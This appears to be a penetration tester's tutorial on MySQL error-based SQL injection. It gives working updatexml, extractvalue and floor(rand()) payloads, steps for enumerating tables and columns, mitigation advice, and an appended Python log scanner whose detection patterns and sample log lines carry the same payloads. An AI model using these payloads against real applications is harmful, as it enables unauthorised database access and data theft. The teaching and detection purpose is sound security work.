congdong007

Penetration Test, Software Developer


MySQL Error-Based SQL Injection

  1. Overview

Error-based injection deliberately triggers an error condition in the database so that the result of an attacker-chosen query is embedded in the error message the application returns. It is useful when UNION-based injection is blocked but the application still relays database error text to the client. It is also known as Formulaic SQL Injection.

  2. Utilizing the updatexml() function:

Payload:

?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));--+

0x7e is the hex encoding of ~; it wraps the result so it is easy to spot in the error text.
updatexml(): MySQL function used to update a fragment of an XML document.
updatexml() syntax: updatexml(target_xml_document, xpath_expression, new_value)
The XPath expression specifies a path within the XML document. If it is malformed, MySQL raises an XPATH syntax error that quotes the offending expression, which is why the concatenated query result appears in the message.

Subsequent steps for updatexml-based error-based injection:

(1). Substitute other queries in place of the select user() subquery.
(2). Retrieve the tables in the current database.
(3). Retrieve the columns of a specific table.
(4). Continue step by step.

  3. Utilizing the extractvalue() function:

Payload:

?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+

The extractvalue() function is similar to updatexml(): it reads node content from an XML document using an XPath expression, and a malformed expression produces the same XPATH syntax error.
Subsequent steps for extractvalue-based error-based injection are the same as for updatexml.

  4. Utilizing the floor() function:

Payload:

?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

The principle is that floor(rand(0)*2) produces a deterministic sequence, so the key used by group by repeats and the group by step fails with a duplicate-key error whose message quotes the key, and therefore the user() value.
group by works by looping over every row, computing its key, and saving results in a temporary table. When a row's key is read, if the key already exists in the temporary table the existing entry is used and not updated; if the key does not exist, the row's key is inserted. Because rand() is evaluated again at insertion time, the key that was looked up and the key that is inserted can differ, so a key that is already present can be inserted a second time, and that duplicate entry raises the error. The subquery needs at least three rows for the sequence to collide, which is why information_schema.tables is used as the source.

  5. Additional Information:

These three functions are commonly used in error-based injections. All three depend on the application relaying raw MySQL error text to the client; returning a generic error page removes the leak, and parameterised queries remove the injection itself.
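As an added detection example (not part of the original post), the following Python scans web-server access-log lines for the three error-based signatures described above, URL-decoding each request first so that single- or double-encoded payloads are still visible. The log format, IP addresses and sample requests are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the three MySQL error-based techniques discussed above.
# Constructed for this example; tune them against your own traffic first.
SIGNATURES = {
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "floor_rand_groupby": re.compile(
        r"\bfloor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*\bgroup\s+by\b", re.I | re.S),
}

# Combined-log request field: ip ... [time] "METHOD target PROTO" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_target(target, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are still visible."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(target):
    """Names of the error-based signatures present in one request target."""
    decoded = decode_target(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (ip, status, techniques) for every log line that trips a signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        techniques = classify(m.group("target"))
        if techniques:
            hits.append((m.group("ip"), int(m.group("status")), techniques))
    return hits

# Constructed sample log lines, not real traffic: one benign request, then the
# page's three payloads URL-encoded (the last one double-encoded).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1%27%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1));--+ HTTP/1.1" 500 231',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%27%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))--+ HTTP/1.1" 500 240',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%2527%2520and%2520(select%25201%2520from%2520(select%2520count(*),concat(user(),floor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a)--+ HTTP/1.1" 500 260',
]
```

A hit paired with a 500 status is the signal to prioritise: it suggests the database error reached the client, so the response handler should be checked for leaking raw error text.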